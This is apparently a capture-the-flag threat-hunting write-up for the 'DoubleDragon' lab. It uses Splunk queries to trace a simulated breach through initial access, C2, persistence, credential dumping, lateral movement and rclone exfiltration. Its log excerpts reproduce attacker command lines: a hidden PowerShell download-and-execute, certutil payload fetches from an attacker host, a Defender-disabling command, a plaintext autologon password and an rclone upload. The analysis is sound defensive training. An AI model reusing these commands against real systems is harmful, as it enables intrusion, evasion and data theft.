Scenario

Lab Link: DoubleDragon

On August 25, 2025, CoreTech's SOC spotted unusual activity on a workstation, hinting at a breach. Suspicious processes and network activity spread to critical servers, threatening data and systems.

Welcome to the DoubleDragon lab! Uncover a cunning cyberattack involving phishing, stealthy tools, and data theft. As a threat hunter, use Splunk and forensics tools to analyze logs and forensic artifacts, tracing the attacker's moves to stop the breach.

Dive into DoubleDragon and thwart the attack!

Reconnaissance

| eventcount summarize=false index=* 
| dedup index 
| fields index

we have

history
main
summary

and we only have one source

source = XmlWinEventLog:Security

index=* 
| stats count by host

• DC01 (Domain Controller)
• DESKTOP (likely the victim workstation)
• FILES-SERVER (file server)

See what event IDs you have on DESKTOP:

index=* host=DESKTOP
| stats count by EventCode
| sort -count

EventCode   count
4658    887895
4656    444663
4690    444120
4663    335442
11      76968
10      54252
30      40586
4703    33646
4657    31255
90      20283
80      15463
81      15463
4673    13498
13      10153
7       7488
82      6985
5156    6735
41      5598
40      5354
5158    3482

Security Logs:

• 4656/4658/4663 - File/Object access
• 4688 - Process creation (if enabled)
• 5156 - Network connections
• 4673 - Privileged service called

Sysmon Logs:

• Event 1 - Process creation (NOT showing - weird!)
• Event 7 - Image/DLL loaded
• Event 10 - Process access
• Event 11 - File created
• Event 13 - Registry modification
• Event 30/40/41/80/81/82/90 - Various Sysmon events

Initial Access

Q1

The intrusion started when the victim accessed a suspicious URL from a file-sharing service. What was the name of the website that triggered the compromise?

 Answer Format: *****.**

C:\Users\Administrator\Desktop\Start Here\Artifacts\DESKTOP\uploads\auto\C%3A\Users\t.leon\AppData\Local\Microsoft\Edge\User Data\Default

Answer:

paste.sh

Execution

Q2

After visiting the site, the victim ran a PowerShell command via Run. What's the full URL of the file downloaded and executed?

we got this in the recon:

"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -WindowStyle Hidden -c "iwr http://10.10.5.171:8883/iexploreplugin.exe -OutFile $env:TEMP\iexploreplugin.exe; Start-Process $env:TEMP\exploreplugin.exe"

Answer:

http://10.10.5.171:8883/iexploreplugin.exe

Q3

A malicious zip file was extracted on the Files Server, yielding two files. What are the names of these extracted files?

Answer Format:

*****.***,*********.***

index=* host=FILES-SERVER EventCode=11 earliest="08/25/2025:14:03:00" latest="08/25/2025:14:10:00" TargetFilename="C:\\Users\\admin143\\Downloads\\*" TargetFilename!="*.zip" TargetFilename!="*.tmp"
| table _time, TargetFilename
| dedup TargetFilename

Answer:

testc.exe,python311.dll

Q4

When one file from Q3 was executed, two additional files appeared on the host. What are the names of these dropped files?

Answer Format:

***_**.***,******_******.***

index=* host=FILES-SERVER EventCode=11 earliest="08/25/2025:14:03:11" latest="08/25/2025:14:10:00" (Image="*testc.exe" OR ParentImage="*testc.exe") | table _time, TargetFilename, Image | sort _time

Command and Control

Q5

Network logs reveal an outbound connection from the payload. What's the attacker's IP address and port used for the initial C2 communication?

Answer Format: **.**.*.**:****

index=* (Application="*testc.exe" OR Application="*iexploreplugin.exe") EventCode=5156 earliest="08/25/2025:13:00:00" latest="08/25/2025:15:00:00"
| table _time, host, Application, DestAddress, DestPort
| sort _time
| head 5

• testc.exe connected to 10.10.5.171:8000 (this is the C2 server)
• iexploreplugin.exe connects to 10.10.5.62:8080

Answer:

10.10.5.62:8080

• 10.10.5.62:8080 = Attacker's C2 listener (where iexploreplugin.exe beacons back to on DESKTOP)
• 10.10.5.171:8883 = Attacker's payload hosting server (where malware is downloaded from)
• 10.10.5.171:8000 = Attacker's C2 listener (where testc.exe beacons back to on FILES-SERVER)

Since iexploreplugin.exe was deployed first (13:28 on DESKTOP) before testc.exe (14:03 on FILES-SERVER), the initial C2 communication of the attacker was: 10.10.5.62:8080

Q6

The attacker connected to a secondary command-and-control server. What's the domain name of this C2 server?

Format:

**********.***

so

• DESKTOP - iexploreplugin.exe beaconed to 10.10.5.62:8080
• FILES-SERVER - testc.exe beaconed to 10.10.5.171:8000

Let's check what happened AFTER the initial compromise on each host. Look for what the malware did next:

index=* host=FILES-SERVER EventCode=22 earliest="08/25/2025:14:03:00" latest="08/25/2025:15:00:00"
| table _time, QueryName, Image
| sort _time
| head 50

_time   QueryName   Image
2025-08-25 14:05:06 agegamepay.com  C:\Users\Public\Downloads\ws2_32.exe
2025-08-25 14:07:07 NT AUTHORITY    C:\Windows\System32\svchost.exe
2025-08-25 14:07:07 agegamepay.com  C:\Users\public\Downloads\ws2_32.exe
2025-08-25 14:07:07 agegamepay.com  C:\Users\public\Downloads\ws2_32.exe
2025-08-25 14:07:08 agegamepay.com  C:\Users\Public\Downloads\ws2_32.exe
2025-08-25 14:07:08 agegamepay.com  C:\Users\public\Downloads\ws2_32.exe

Answer:

agegamepay.com

Q7

Executing the files from Q4 triggered connections to the attacker's C2 server. What are the two ports used for these connections?

index=* (host="*Files*Server*" OR host="*file*server*") 
EventCode=3
(Image="*ws2_32.exe*" OR Image="*system_module.exe*")
| table _time, Image, DestinationIp, DestinationPort, SourcePort
| sort - _time

Answer:

8443,8083

Persistence

Q8

During persistence, the attacker leveraged integrator credentials for remote management software. Which credentials were used to link to their account?

Answer Format: *************.**@*****.***,******************

index=* host=DESKTOP Image="*powershell*" earliest="08/25/2025:13:45:00" latest="08/25/2025:13:50:00"
| table _time, CommandLine, ParentImage

powershell -Command "Invoke-WebRequest -Uri 'https://HelpdeskSupport1755068837448.servicedesk.atera.com/GetAgent/Msi/?customerId=1&integratorLogin=bunionsneaker.4m%%40gmail.com&accountId=001Q300000VzBKuIAN' -OutFile C:\Windows\Temp\setup.msi; Start-Process msiexec -ArgumentList '/i C:\Windows\Temp\setup.msi /qn IntegratorLogin=bunionsneaker.4m@gmail.com CompanyId=1 AccountId=001Q300000VzBKuIAN' -Wait"

Answer:

bunionsneaker.4m@gmail.com,001Q300000VzBKuIAN

Q9

The attacker installed three remote management services for persistence. What are the names of these services?

Answer Format: **********,**********************,*******

index=* (EventCode=4697 OR EventCode=7045) host="desktop"
| stats values(ServiceName) values(ImagePath) by _time host

Answer:

AteraAgent,SplashtopRemoteService,AnyDesk

Q10

Installing the remote management tool from Q9 created two scheduled tasks. What are the names of these tasks?

Answer Format: ********** ********,*************************

When Atera installed, it created two scheduled tasks to keep itself running. Here's how we found them:

Splunk Query:

index=* host=DESKTOP (EventCode=4698 OR EventCode=106) earliest="08/25/2025:13:45:00" latest="08/25/2025:14:00:00"
| table _time, TaskName, EventCode

This query searches for EventCode 4698 (scheduled task created) right after Atera was installed at 13:45. Found: AteraAgentServiceWatchdog

Forensic Artifacts:

Opened the folder:

C:\Users\Administrator\Desktop\Start Here\Artifacts\DESKTOP\uploads\auto\C%3A\Windows\System32\Tasks

Scheduled tasks are stored as XML files in C:\Windows\System32\Tasks\. Looked through the extracted files and found: Monitoring Recovery

Why check both places?

The Splunk logs showed one task being created, but didn't catch the other one. By checking the actual task files on disk from the forensic image, we found the second task. Sometimes you need to look at both logs and disk artifacts to get everything.

Both tasks make sure Atera keeps running even if someone tries to stop it - that's how the attacker maintains access.

Answer:

Monitoring Recovery,AteraAgentServiceWatchdog

Q11

During the persistence phase, the attacker created a shortcut to ensure malicious code execution. Which script was responsible for creating this shortcut?

Answer Format: *******.***

index=* host=DESKTOP EventCode=11 TargetFilename="*Startup*.lnk" earliest="08/25/2025:13:00:00" latest="08/25/2025:15:00:00"
| table _time, TargetFilename, Image

C:\Users\t.leon\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\iexplorer.lnk

iexplorer.lnk created by: C:\Windows\system32\cscript.exe

cscript.exe is the Windows Script Host that runs VBScript and JScript files. So a script (likely .vbs or .js) created this malicious shortcut in the Startup folder.

index=* host=DESKTOP Image="*cscript.exe" earliest="08/25/2025:13:52:20" latest="08/25/2025:13:52:30"
| table _time, CommandLine, ParentImage

2025-08-25 13:52:25 cscript.exe  C:\Users\t.leon\scvhost.vbs    C:\Windows\System32\cmd.exe

so the answer is:

scvhost.vbs

Q12

On the domain server, the attacker configured automatic logon using a user's credentials. What is the password used, and what is the name of the script responsible for this configuration?

Answer Format: **********!***,******.***

Let's search for automatic logon configuration on the DC. This is stored in the registry under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon.

index=* host=DC01 earliest="08/25/2025:13:00:00" latest="08/25/2025:23:59:59" (password OR autologon OR winlogon) | table _time, EventCode, Image, CommandLine

_time   EventCode   Image   CommandLine
2025-08-25 14:46:02 1   C:\Windows\System32\reg.exe reg   add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoAdminLogon /t REG_SZ /d 1 /f
2025-08-25 14:46:02 1   C:\Windows\System32\reg.exe reg   add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword /t REG_SZ /d CyberNight!128 /f
2025-08-25 14:46:02 1   C:\Windows\System32\reg.exe reg   add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName /t REG_SZ /d Main\william /f

index=* (host="*Domain*Server*" OR host="*domain*server*" OR host="*DC*")
EventCode=1
Image="*reg.exe*"
CommandLine="*DefaultPassword*"
| table _time, CommandLine, ParentImage, ParentCommandLine, User
| sort - _time

2025-08-25 14:46:02 reg   add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword /t REG_SZ /d CyberNight!128 /f    C:\Windows\System32\cmd.exe "cmd.exe" /C C:\Programdata\Microsoft\dhsf82.bat > C:\Windows\Temp\qtcasIRP.tmp 2>&1  NT AUTHORITY\SYSTEM

CyberNight!128,dhsf82.bat

Discovery

Q13

During reconnaissance, the attacker enumerated domain accounts. What's the command used to list all domain users?

just search

net user /domain

Q14

The attacker, during reconnaissance, ran an enumeration tool via C2 after migrating to another process. The tool then generated an output file on the victim host. Which process did they migrate into, and what zip file was created?

Answer Format: *******.***,**************_**********.***

index=* EventCode=11 TargetFilename="*.zip" earliest="08/25/2025:13:00:00" latest="08/25/2025:23:59:59"
| table _time, host, TargetFilename, Image, User
| sort _time

_time   host    TargetFilename  Image   User
2025-08-25 13:35:57 DESKTOP C:\Users\Public\20250825133552_BloodHound.zip   C:\Windows\system32\notepad.exe CORETECH\t.leon
2025-08-25 14:01:29 FILES-SERVER    C:\Users\admin143\Downloads\python.zip  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   NT AUTHORITY\SYSTEM

Answer:

notepad.exe,20250825133552_BloodHound.zip

Defense Evasion

Q15

To evade detection, the attacker disabled a Windows Defender feature. What's the full command used for this?

Format:

**********.*** -*********** ****** -******* ***-************ -*************************

index=* CommandLine="*DisableRealtimeMonitoring*" earliest="08/25/2025:13:00:00" latest="08/25/2025:23:59:59"
| table _time, host, CommandLine, Image

2025-08-25 13:53:40 DESKTOP powershell.exe  -WindowStyle Hidden -Command Set-MpPreference -DisableRealtimeMonitoring    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
2025-08-25 13:53:39 DESKTOP cmd.exe /c "powershell.exe -WindowStyle Hidden -Command Set-MpPreference -DisableRealtimeMonitoring"    C:\Windows\System32\cmd.exe

so answer:

powershell.exe -WindowStyle Hidden -Command Set-MpPreference -DisableRealtimeMonitoring

Credential Access

Q16

The attacker managed to dump hashes on the DESKTOP host. What is the process they migrated to before dumping the hashes?

Answer Format: *******.***

Let's search for credential dumping activity. Common tools include Mimikatz, which dumps LSASS memory for password hashes.

index=* host=DESKTOP EventCode=10 TargetImage="*lsass.exe" earliest="08/25/2025:13:00:00" latest="08/25/2025:23:59:59"
| table _time, SourceImage, TargetImage, GrantedAccess

Answer:

spoolsv.exe

Lateral Movement

Q17

During lateral movement, the attacker accessed the file server. What's the username used for this access?

Answer Format: ********

Let's search for logon events on FILES-SERVER to find which account the attacker used:

index=* host="*Files*Server*" OR host="*file*server*"
EventCode=4624
NOT (LogonType=5 OR LogonType=0)
| table _time, LogonType, TargetUserName, SourceNetworkAddress, WorkstationName, LogonProcessName
| sort - _time

The attacker used admin143 to access FILES-SERVER during lateral movement.

Looking at the earlier logs, we saw admin143 logging in from 10.10.5.62 (the attacker's workstation) starting around 13:58. This account was likely compromised from the hash dump on DESKTOP, then used to move laterally to FILES-SERVER.

Answer:

admin143

Q18

Determining the timestamp of lateral movement to the Domain Controller is key for attack analysis. When did the attacker successfully access it?

Format

yyyy-mm-dd hh:mm

index=* host=DC01 EventCode=1 user="*admin143*" earliest="08/25/2025:13:00:00" latest="08/25/2025:23:59:59"
| table _time, Image, CommandLine, User
| sort _time
| head 1

2025-08-25 14:34:31 C:\Windows\System32\cmd.exe cmd.exe /Q /c cd  1> \\127.0.0.1\ADMIN$\__1756132470.4862552 2>&1 CORETECH\admin143

Answer:

2025-08-25 14:34

Collection

Q19

The attacker compressed specific files on the compromised file server for exfiltration. What is the full path to the file where the attacker saved the compressed data?

Answer Format: *:\***********\*****\*****-********.***

index=* host="*Files*Server*" OR host="*file*server*"
EventCode=1
Image="*powershell.exe*"
CommandLine="*Compress-Archive*"
| table _time, CommandLine, User
| sort - _time

answer:

C:\ProgramData\Teams\teams-skartech.zip

Exfiltration

Q20

The attacker used a tool for syncing files to cloud storage to exfiltrate data from the compromised file server. What is the name of the specific folder or path on the remote storage service used for exfiltration?

Answer Format: *********-*******

From earlier in the investigation, when we looked at process execution around the time of data compression, we saw this at 14:25:03:

index=* host=FILES-SERVER EventCode=1 earliest="08/25/2025:14:00:00" latest="08/25/2025:14:30:00" | table _time, Image, CommandLine

The results showed:   C:\ProgramData\Teams\rclone\rclone-v1.71.0-windows-amd64\rclone.exe  

Also, way earlier when we searched for the malicious zip extraction at 14:22:24, we saw:

powershell -Command "Expand-Archive -Path 'C:\ProgramData\teams\rclone+config.zip' -DestinationPath 'C:\ProgramData\teams\rclone' -Force"

search for the specific upload command we saw earlier

index=* host=FILES-SERVER CommandLine="*remote:*" earliest="08/25/2025:14:00:00" latest="08/25/2025:23:59:59"
| table _time, CommandLine

2025-08-25 14:25:03 cmd.exe /c "C:\ProgramData\Teams\rclone\rclone-v1.71.0-windows-amd64\rclone.exe copy teams-starktech.zip remote:starktech-backups"

The attacker used rclone (a cloud sync tool) to exfiltrate the compressed data to a remote cloud storage location.

The command copied teams-starktech.zip to the remote path: starktech-backups

Answer:

starktech-backups

Impact

Q21

The attacker downloaded two scripts to the Domain Controller to attempt file encryption. What are the names of these two scripts?

Answer Format: ******.****,******.***

index=* host=DC01 (CommandLine="*certutil*" OR CommandLine="*iwr*") earliest="08/25/2025:14:35:00" latest="08/25/2025:14:45:00"
| table _time, CommandLine
| sort _time

2025-08-25 14:36:51 certutil  -urlcache -split -f https://raw.githubusercontent.com/muahmmedshahblis/blabla/refs/heads/main/crypto.psm1 C:\ProgramData\crypto.psm1
2025-08-25 14:36:51 cmd.exe /Q /c certutil -urlcache -split -f https://raw.githubusercontent.com/muahmmedshahblis/blabla/refs/heads/main/crypto.psm1 C:\ProgramData\crypto.psm1 1> \\127.0.0.1\ADMIN$\__1756132470.4862552 2>&1
2025-08-25 14:37:57 certutil  -urlcache -split -f https://raw.githubusercontent.com/muahmmedshahblis/blabla/refs/heads/main/script.ps1 C:\ProgramData\script.ps1
2025-08-25 14:37:57 cmd.exe /Q /c certutil -urlcache -split -f https://raw.githubusercontent.com/muahmmedshahblis/blabla/refs/heads/main/script.ps1 C:\ProgramData\script.ps1 1> \\127.0.0.1\ADMIN$\__1756132470.4862552 2>&1
2025-08-25 14:42:31 certutil  -urlcache -split -f http://10.10.5.171:8883/up.bat C:\Users\Public\up.bat
2025-08-25 14:42:31 cmd.exe /Q /c certutil -urlcache -split -f http://10.10.5.171:8883/up.bat C:\Users\Public\up.bat 1> \\127.0.0.1\ADMIN$\__1756132945.567945 2>&1
2025-08-25 14:44:11 certutil  -urlcache -split -f http://10.10.5.171:8883/dhsf82.bat C:\Programdata\Microsoft\dhsf82.bat
2025-08-25 14:44:11 cmd.exe /Q /c certutil -urlcache -split -f http://10.10.5.171:8883/dhsf82.bat C:\Programdata\Microsoft\dhsf82.bat 1> \\127.0.0.1\ADMIN$\__1756132945.567945 2>&1

The two scripts downloaded for encryption attempt:

1. crypto.psm1 - Downloaded at 14:36:51 (6 chars + 4 chars = crypto.psm1)
2. script.ps1 - Downloaded at 14:37:57 (6 chars + 3 chars = script.ps1)

Answer:

crypto.psm1,script.ps1